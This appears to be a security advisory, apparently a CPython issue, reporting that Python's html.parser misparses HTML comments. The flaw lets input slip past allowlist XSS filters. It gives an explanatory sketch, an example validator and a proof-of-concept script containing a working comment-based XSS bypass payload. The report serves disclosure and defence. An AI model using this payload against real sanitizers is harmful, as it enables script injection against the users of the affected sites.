Description
The html.parser library allows an attacker to bypass any allowlist of HTML tags and attributes that seeks to mitigate XSS. This is possible because the parser does not correctly parse HTML comments in user input.
Vulnerability
The vulnerability occurs because html.parser does not correctly parse HTML comments in user input, so the parser and a browser can disagree about where a comment ends.
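To illustrate the kind of disagreement involved, here is a minimal sketch that compares two ways of locating the end of a comment. The HTML Standard tokenizer ends a comment at `--!>` as well as at `-->`. The `LEGACY_COMMENT_CLOSE` pattern is an assumption about how a parser that only recognizes `-->` might search for the terminator; it is a simplified model, not taken from this report, and both patterns ignore other edge cases such as `<!-->`.

```python
import re

# Assumption: a simplified model of a terminator search that only accepts
# "-->" (optionally with whitespace before the ">").
LEGACY_COMMENT_CLOSE = re.compile(r"--\s*>")

# Simplified model of the HTML Standard, which also ends a comment at "--!>".
HTML5_COMMENT_CLOSE = re.compile(r"--!?>")


def comment_end(pattern, html):
    """Return the index just past the comment terminator, or -1 if none is found."""
    if not html.startswith("<!--"):
        return -1
    match = pattern.search(html, 4)  # skip the "<!--" opener
    return match.end() if match else -1


payload = '<!--!> <h1 value="--!><script>alert(document.domain)</script>'

legacy_end = comment_end(LEGACY_COMMENT_CLOSE, payload)
html5_end = comment_end(HTML5_COMMENT_CLOSE, payload)

print("legacy terminator found at:", legacy_end)
print("HTML5 terminator found at:", html5_end)
if html5_end != -1:
    print("markup a browser would parse next:", payload[html5_end:])
```

Under these assumptions the legacy pattern never finds a terminator in the payload, while the HTML Standard rule ends the comment at `--!>` and leaves the `<script>` element as live markup.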
Exploitation
In this scenario, a developer parses user-supplied HTML and validates it against an allowlist of tags and attributes in order to prevent XSS attacks. A security check of this type can be bypassed because the parser does not parse HTML comments properly.
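For context, a validator of the kind described might look roughly like the sketch below. The names `AllowlistValidator`, `ALLOWED_TAGS`, `ALLOWED_ATTRS`, and `is_allowed` are hypothetical and chosen for illustration; the allowlist itself (`h1` and `alt`) mirrors the check in the proof of concept.

```python
from html.parser import HTMLParser

# Hypothetical allowlist, mirroring the h1/alt check in the proof of concept.
ALLOWED_TAGS = {"h1"}
ALLOWED_ATTRS = {"alt"}


class AllowlistValidator(HTMLParser):
    """Collects every tag and attribute name that is not on the allowlist."""

    def __init__(self):
        super().__init__()
        self.violations = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.violations.append(("tag", tag))
        for name, _value in attrs:
            if name not in ALLOWED_ATTRS:
                self.violations.append(("attr", name))


def is_allowed(html):
    """Return True when the parser reported no disallowed tag or attribute."""
    validator = AllowlistValidator()
    validator.feed(html)
    validator.close()
    return not validator.violations


print(is_allowed('<h1 alt="title">Hello</h1>'))
print(is_allowed("<script>alert(1)</script>"))
```

A check like this only sees the tags the parser reports. If the parser tokenizes an input differently from a browser, markup the validator never inspected can still reach the page.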
poc.py
from html.parser import HTMLParser
from html.entities import name2codepoint


class MyHTMLParser(HTMLParser):
    def handle_starttag(self, tag, attrs):
        print("Start tag:", tag)
        # Allowlist check for tags: only h1 is permitted
        print("Invalid tag:", tag != "h1")
        for attr in attrs:
            # Allowlist check for attributes: attr is a (name, value) tuple,
            # so compare the attribute name rather than the whole tuple
            print("attr:", attr)
            print("Invalid attr:", attr[0] != "alt")

    def handle_endtag(self, tag):
        print("End tag :", tag)

    def handle_data(self, data):
        print("Data :", data)

    def handle_comment(self, data):
        print("Comment :", data)

    def handle_entityref(self, name):
        c = chr(name2codepoint[name])
        print("Named ent:", c)

    def handle_charref(self, name):
        # Hexadecimal references start with "x"; the rest are decimal
        if name.startswith('x'):
            c = chr(int(name[1:], 16))
        else:
            c = chr(int(name))
        print("Num ent :", c)

    def handle_decl(self, data):
        print("Decl :", data)


parser = MyHTMLParser()
parser.feed('<!--!> <h1 value="--!><script>alert(document.domain)</script>')
# HTML is safe, we can proceed
Evidence of exploitation
Expected behavior
System Information
- CPython versions tested on: Python 3.10.8
- Operating system and architecture: GNU/Linux x86_64
Linked PRs